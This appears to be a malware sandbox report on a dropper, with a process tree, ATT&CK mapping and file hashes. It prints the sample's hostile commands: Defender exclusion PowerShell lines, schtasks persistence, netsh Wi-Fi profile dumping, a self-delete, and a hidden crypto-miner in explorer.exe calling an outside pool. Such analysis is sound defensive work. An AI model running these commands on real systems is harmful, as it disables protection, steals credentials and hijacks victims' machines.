PID 1304 wrote to memory of 1512	1304	a71f91351dc1bb57f0426080f2c03854.exe	Vu.exe
PID 1304 wrote to memory of 1512	1304	a71f91351dc1bb57f0426080f2c03854.exe	Vu.exe
PID 1304 wrote to memory of 1512	1304	a71f91351dc1bb57f0426080f2c03854.exe	Vu.exe
PID 1748 wrote to memory of 1740	1748	python.exe	python.exe
PID 1748 wrote to memory of 1740	1748	python.exe	python.exe
PID 1748 wrote to memory of 1740	1748	python.exe	python.exe
PID 1304 wrote to memory of 820	1304	a71f91351dc1bb57f0426080f2c03854.exe	Obus.exe
PID 1304 wrote to memory of 820	1304	a71f91351dc1bb57f0426080f2c03854.exe	Obus.exe
PID 1304 wrote to memory of 820	1304	a71f91351dc1bb57f0426080f2c03854.exe	Obus.exe
PID 1304 wrote to memory of 820	1304	a71f91351dc1bb57f0426080f2c03854.exe	Obus.exe
PID 1328 wrote to memory of 864	1328	ex.exe	cmd.exe
PID 1328 wrote to memory of 864	1328	ex.exe	cmd.exe
PID 1328 wrote to memory of 864	1328	ex.exe	cmd.exe
PID 1340 wrote to memory of 324	1340	ec.exe	cmd.exe
PID 1340 wrote to memory of 324	1340	ec.exe	cmd.exe
PID 1340 wrote to memory of 324	1340	ec.exe	cmd.exe
PID 864 wrote to memory of 1880	864	cmd.exe	powershell.exe
PID 864 wrote to memory of 1880	864	cmd.exe	powershell.exe
PID 864 wrote to memory of 1880	864	cmd.exe	powershell.exe
PID 324 wrote to memory of 796	324	cmd.exe	powershell.exe
PID 324 wrote to memory of 796	324	cmd.exe	powershell.exe
PID 324 wrote to memory of 796	324	cmd.exe	powershell.exe
PID 1512 wrote to memory of 2172	1512	Vu.exe	powershell.exe
PID 1512 wrote to memory of 2172	1512	Vu.exe	powershell.exe
PID 1512 wrote to memory of 2172	1512	Vu.exe	powershell.exe
PID 2172 wrote to memory of 2264	2172	powershell.exe	cmd.exe
PID 2172 wrote to memory of 2264	2172	powershell.exe	cmd.exe
PID 2172 wrote to memory of 2264	2172	powershell.exe	cmd.exe
PID 2172 wrote to memory of 2312	2172	powershell.exe	netsh.exe
PID 2172 wrote to memory of 2312	2172	powershell.exe	netsh.exe
PID 2172 wrote to memory of 2312	2172	powershell.exe	netsh.exe
PID 864 wrote to memory of 2536	864	cmd.exe	powershell.exe
PID 864 wrote to memory of 2536	864	cmd.exe	powershell.exe
PID 864 wrote to memory of 2536	864	cmd.exe	powershell.exe
PID 1512 wrote to memory of 2588	1512	Vu.exe	cmd.exe
PID 1512 wrote to memory of 2588	1512	Vu.exe	cmd.exe
PID 1512 wrote to memory of 2588	1512	Vu.exe	cmd.exe
PID 2588 wrote to memory of 2624	2588	cmd.exe	powershell.exe
PID 2588 wrote to memory of 2624	2588	cmd.exe	powershell.exe
PID 2588 wrote to memory of 2624	2588	cmd.exe	powershell.exe
PID 324 wrote to memory of 2636	324	cmd.exe	powershell.exe
PID 324 wrote to memory of 2636	324	cmd.exe	powershell.exe
PID 324 wrote to memory of 2636	324	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\a71f91351dc1bb57f0426080f2c03854.exe
"C:\Users\Admin\AppData\Local\Temp\a71f91351dc1bb57f0426080f2c03854.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1304

C:\Users\Admin\AppData\Local\Temp\python\python.exe
"C:\Users\Admin\AppData\Local\Temp\python\python.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1748

C:\Users\Admin\AppData\Local\Temp\python\python.exe
"C:\Users\Admin\AppData\Local\Temp\python\python.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1740

C:\Users\Admin\AppData\Local\Temp\AudioOutM\dcbl.exe
"C:\Users\Admin\AppData\Local\Temp\AudioOutM\dcbl.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1196

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "asasasas" /tr '"C:\Users\Admin\AppData\Local\Temp\asasasas.exe"' & exit
3⤵
PID:2460

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "asasasas" /tr '"C:\Users\Admin\AppData\Local\Temp\asasasas.exe"'
4⤵
- Creates scheduled task(s)
PID:2828

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpFB5F.tmp.bat""
3⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2068

C:\Windows\SysWOW64\timeout.exe
timeout 3
4⤵
- Delays execution with timeout.exe
PID:2448

C:\Users\Admin\AppData\Local\Temp\asasasas.exe
"C:\Users\Admin\AppData\Local\Temp\asasasas.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1520

C:\Users\Admin\AppData\Local\Temp\SecurityTrayManager\ex.exe
"C:\Users\Admin\AppData\Local\Temp\SecurityTrayManager\ex.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1328

C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:864

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1880

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2536

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1136

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
4⤵
PID:2068

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "defendernottray" /tr '"c:\windows\system32\defendernottray.exe"' & exit
3⤵
PID:2848

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "defendernottray" /tr '"c:\windows\system32\defendernottray.exe"'
4⤵
- Creates scheduled task(s)
PID:2912

C:\windows\system32\defendernottray.exe
"C:\windows\system32\defendernottray.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2956

C:\windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
4⤵
PID:3044

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2604

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2624

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "defendernottray" /tr '"c:\windows\system32\defendernottray.exe"' & exit
4⤵
PID:928

\??\c:\windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "defendernottray" /tr '"c:\windows\system32\defendernottray.exe"'
5⤵
- Creates scheduled task(s)
PID:2916

C:\windows\system32\microsoft\libs\sihost64.exe
"C:\windows\system32\microsoft\libs\sihost64.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
PID:2948

C:\windows\system32\defendernottray.exe
"C:\windows\system32\defendernottray.exe"
5⤵
- Executes dropped EXE
PID:2376

C:\windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
6⤵
PID:2864

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
7⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2304

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
7⤵
PID:2124

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
7⤵
PID:3000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
7⤵
PID:3048

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=67.242.2.35:3333 --user=CMRBKYMNO --pass= --cpu-max-threads-hint=70 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6CJ80EuZhDq7w3QiPw3/9PYjASC1sXGu0nCxs9jooG2T" --cinit-idle-wait=12 --cinit-idle-cpu=90 --nicehash --cinit-stealth
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1504

C:\Users\Admin\AppData\Local\Temp\WindowsDefenderHelper\ec.exe
"C:\Users\Admin\AppData\Local\Temp\WindowsDefenderHelper\ec.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1340

C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:324

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:796

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2172

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2240

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "trayfontdefender" /tr '"c:\windows\system32\trayfontdefender.exe"' & exit
3⤵
PID:2824

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "trayfontdefender" /tr '"c:\windows\system32\trayfontdefender.exe"'
4⤵
- Creates scheduled task(s)
PID:2884

C:\windows\system32\trayfontdefender.exe
"C:\windows\system32\trayfontdefender.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2996

C:\windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
4⤵
PID:2264

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1824

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2840

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2316

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2800

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "trayfontdefender" /tr '"c:\windows\system32\trayfontdefender.exe"' & exit
4⤵
PID:2864

\??\c:\windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "trayfontdefender" /tr '"c:\windows\system32\trayfontdefender.exe"'
5⤵
- Creates scheduled task(s)
PID:2416

C:\windows\system32\microsoft\telemetry\sihost32.exe
"C:\windows\system32\microsoft\telemetry\sihost32.exe"
4⤵
- Executes dropped EXE
PID:2180

C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe
"C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe"
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
PID:820

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vorxrfpg.cmdline"
3⤵
PID:2276

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE5DD.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE5DC.tmp"
4⤵
PID:2248

C:\Windows\SysWOW64\WindowsInput.exe
"C:\Windows\SysWOW64\WindowsInput.exe" --install
3⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1572

C:\Windows\lsddsds\lsdds.exe
"C:\Windows\lsddsds\lsdds.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2416

C:\Users\Admin\AppData\Local\Temp\olsdd.exe
"C:\Users\Admin\AppData\Local\Temp\olsdd.exe" /launchSelfAndExit "C:\Windows\lsddsds\lsdds.exe" 2416 /protectFile
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2280

C:\Users\Admin\AppData\Local\Temp\olsdd.exe
"C:\Users\Admin\AppData\Local\Temp\olsdd.exe" /watchProcess "C:\Windows\lsddsds\lsdds.exe" 2416 "/protectFile"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1888

C:\Users\Admin\AppData\Local\Temp\Vulturi\Vu.exe
"C:\Users\Admin\AppData\Local\Temp\Vulturi\Vu.exe"
2⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1512

C:\Windows\system32\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
3⤵
PID:2172

C:\Windows\system32\chcp.com
chcp 65001
4⤵
PID:2264

C:\Windows\system32\netsh.exe
netsh wlan show networks mode=bssid
4⤵
PID:2312

C:\Windows\system32\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
3⤵
- Suspicious use of WriteProcessMemory
PID:2588

C:\Windows\system32\chcp.com
chcp 65001
4⤵
PID:2624

C:\Windows\system32\netsh.exe
netsh wlan show profile
4⤵
PID:2648

C:\Windows\system32\findstr.exe
findstr All
4⤵
PID:2660

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Vulturi\Vu.exe"
3⤵
PID:2260

C:\Windows\system32\chcp.com
chcp 65001
4⤵
PID:2184

C:\Windows\system32\PING.EXE
ping 127.0.0.1
4⤵
- Runs ping.exe
PID:2244

C:\Users\Admin\AppData\Local\Temp\Omlious\frefef.exe
"C:\Users\Admin\AppData\Local\Temp\Omlious\frefef.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1492

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1492 -s 480
3⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620

C:\Windows\SysWOW64\WindowsInput.exe
"C:\Windows\SysWOW64\WindowsInput.exe"
1⤵
- Executes dropped EXE
PID:1140

C:\Windows\system32\taskeng.exe
taskeng.exe {4063E9A0-34CA-4360-B09F-AC96096D5D3F} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
1⤵
PID:2096

C:\Windows\lsddsds\lsdds.exe
C:\Windows\lsddsds\lsdds.exe
2⤵
- Executes dropped EXE
PID:2692

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2b5c018f-f13c-427a-86be-0422a66de417
MD5
e5b3ba61c3cf07deda462c9b27eb4166

SHA1
b324dad73048be6e27467315f82b7a5c1438a1f9

SHA256
b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925

SHA512
a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_476725f0-e593-4b69-b8a3-7dfed1307544
MD5
d89968acfbd0cd60b51df04860d99896

SHA1
b3c29916ccb81ce98f95bbf3aa8a73de16298b29

SHA256
1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

SHA512
b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_53b282cd-9512-4708-b0e8-a7f328b43aa4
MD5
7f79b990cb5ed648f9e583fe35527aa7

SHA1
71b177b48c8bd745ef02c2affad79ca222da7c33

SHA256
080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

SHA512
20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_90447770-304d-4457-b662-fc5a01a588be
MD5
faa37917b36371249ac9fcf93317bf97

SHA1
a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4

SHA256
b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132

SHA512
614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_945f6233-6337-4003-96a0-416b9b70062c
MD5
2d5cd190b5db0620cd62e3cd6ba1dcd3

SHA1
ff4f229f4fbacccdf11d98c04ba756bda80aac7a

SHA256
ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d

SHA512
edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_94678191-e0ce-4820-a36c-d6440b997741
MD5
6f0d509e28be1af95ba237d4f43adab4

SHA1
c665febe79e435843553bee86a6cea731ce6c5e4

SHA256
f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e

SHA512
8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e5759ee6-c4d2-47ab-b117-577e85427cdf
MD5
a70ee38af4bb2b5ed3eeb7cbd1a12fa3

SHA1
81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

SHA256
dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

SHA512
8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
8b8a272fb566391acc4906742ebbbad4

SHA1
f6a5ff8a4f8ac0f48bfa3a5fcb5b8546f2f8fbc4

SHA256
94b7a9cf77ffce575fa2de5c9c15bf50e04dbc8faabdba3d7d4b41871be2f3ee

SHA512
2b1a18880c95793000dc5e9a866a0a016f76309ed42d1692e13583c210fc0050bc1188d4c58a34544e9beb7c6943b05222a9c4157139224a1a7183fe04744ee5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
bd3f591faed565b950a3204c7aaf7508

SHA1
168b9b244e80649aae70d951d347e75cd8de7da0

SHA256
a78199f7f5ec605907e95801dd55d5798ef39027cd8d6dc894d153163dedf195

SHA512
29e89cb43f551f6463f8e90fb1c42aa5969ea86d3f5cf5aab78feb52c1b457d3bbeec9494b040f460b956a162a25d36ada94183f6391c2458ed69c6393b6f666

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
bd3f591faed565b950a3204c7aaf7508

SHA1
168b9b244e80649aae70d951d347e75cd8de7da0

SHA256
a78199f7f5ec605907e95801dd55d5798ef39027cd8d6dc894d153163dedf195

SHA512
29e89cb43f551f6463f8e90fb1c42aa5969ea86d3f5cf5aab78feb52c1b457d3bbeec9494b040f460b956a162a25d36ada94183f6391c2458ed69c6393b6f666

Download Submit
C:\Users\Admin\AppData\Local\Temp\AudioOutM\dcbl.exe
MD5
f66e55cb2019425ba694948cc0355560

SHA1
30d2e88f4da43baa0055ce592bbdbd13e0f7244a

SHA256
8439ef55f6eabc62d3c9d4a3cfe1ef042b48e6718c61bc0d834084b8c1b8bbe7

SHA512
e3c00a56758a26ea786b030fcd6ab6cb42282d252cca6d07003639354fb35f9444f6cc535f3b0bf02d8426b88d4b18edec506644d4b2d2a6fe792d3b93bbaa23

Download Submit
C:\Users\Admin\AppData\Local\Temp\AudioOutM\dcbl.exe
MD5
f66e55cb2019425ba694948cc0355560

SHA1
30d2e88f4da43baa0055ce592bbdbd13e0f7244a

SHA256
8439ef55f6eabc62d3c9d4a3cfe1ef042b48e6718c61bc0d834084b8c1b8bbe7

SHA512
e3c00a56758a26ea786b030fcd6ab6cb42282d252cca6d07003639354fb35f9444f6cc535f3b0bf02d8426b88d4b18edec506644d4b2d2a6fe792d3b93bbaa23

Download Submit
C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe
MD5
ad8e052d00bfc89e09c047f048ea63da

SHA1
c1d0dba06f790d20794039970fe61d94479ee6f9

SHA256
ccecc3771947e3767dc9b0eb36f34886237e5c3aca60de94a610a6d81f93f9ab

SHA512
b8ba4b34279406939df8d37a6934b9f406e782fc9202b825cd34d4c9e4e6d70748505a6aadc0ed2d114d8f2220cd80b83780909fe582781981f842fbbb79909b

Download Submit
C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe
MD5
ad8e052d00bfc89e09c047f048ea63da

SHA1
c1d0dba06f790d20794039970fe61d94479ee6f9

SHA256
ccecc3771947e3767dc9b0eb36f34886237e5c3aca60de94a610a6d81f93f9ab

SHA512
b8ba4b34279406939df8d37a6934b9f406e782fc9202b825cd34d4c9e4e6d70748505a6aadc0ed2d114d8f2220cd80b83780909fe582781981f842fbbb79909b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Omlious\frefef.exe
MD5
2ed63566ece20dbdfbb8bed11e075ddc

SHA1
b7d411fa43c83fceabc557368edab88c23b0a5c7

SHA256
a7c70d3c35b9776c8ca407bb26250435b8e3beeedcc213b7fe6d98f12ca2a99a

SHA512
a5787d3aaf3f9abf9b09d25c25aa95b3735c7f8a26eeef8775f58349dc6266dac032c36b602236197b553c61bb4958cdd8091047171a895d107aca89f8e2ec69

Download Submit
C:\Users\Admin\AppData\Local\Temp\Omlious\frefef.exe
MD5
2ed63566ece20dbdfbb8bed11e075ddc

SHA1
b7d411fa43c83fceabc557368edab88c23b0a5c7

SHA256
a7c70d3c35b9776c8ca407bb26250435b8e3beeedcc213b7fe6d98f12ca2a99a

SHA512
a5787d3aaf3f9abf9b09d25c25aa95b3735c7f8a26eeef8775f58349dc6266dac032c36b602236197b553c61bb4958cdd8091047171a895d107aca89f8e2ec69

Download Submit
C:\Users\Admin\AppData\Local\Temp\SecurityTrayManager\ex.exe
MD5
1396c4279e7dd5e24be782c88871fed3

SHA1
f3d1eca6c761a69e25c6aa592116edbb817a8aad

SHA256
6bba280d029817a29af0dce3a7d6676e2105e467d292ffe78e4d869e2dd51310

SHA512
331bbc4095c76067ace0bd78c4d317f8cb92e5989138ec02f32d4b51b8ec69cde4bd4149c85712a3356e4967cc99be0478487d91166cb562cc169294287118c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\SecurityTrayManager\ex.exe
MD5
1396c4279e7dd5e24be782c88871fed3

SHA1
f3d1eca6c761a69e25c6aa592116edbb817a8aad

SHA256
6bba280d029817a29af0dce3a7d6676e2105e467d292ffe78e4d869e2dd51310

SHA512
